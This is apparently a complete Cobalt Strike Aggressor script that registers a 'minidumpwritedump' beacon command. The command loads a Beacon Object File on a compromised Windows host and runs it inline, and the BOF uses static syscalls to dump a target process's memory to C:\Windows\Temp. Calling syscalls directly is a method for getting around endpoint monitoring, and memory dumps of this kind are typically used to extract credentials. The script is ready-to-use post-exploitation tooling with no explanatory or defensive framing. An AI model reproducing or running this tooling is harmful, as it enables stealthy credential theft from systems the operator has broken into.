beacon_command_register(
"minidumpwritedump", 
"Use static syscalls to execute a custom MiniDumpWriteDump implementation.", 
"Synopsis: minidumpwritedump PID");
alias minidumpwritedump {
    local('$handle $data $args $output_file');
    
    # figure out the arch of this session
    $barch  = barch($1);
    
    # read in the right BOF file
    $handle = openf(script_resource("minidumpwritedump. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);
    if(size(@_) < 2)
    {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("minidumpwritedump"));
        return;
    }
    $output_file = iff(-istrue $3, $3, "C:\\Windows\\Temp\\PID- $+ $2 $+ .dmp");
    # pack our arguments
    $args = bof_pack($1, "iz", $2, $output_file);
    
    btask($1, "Static Syscalls Custom MiniDumpWriteDump BOF (@rookuu_)");
    # execute it.
    beacon_inline_execute($1, $data, "go", $args);
}

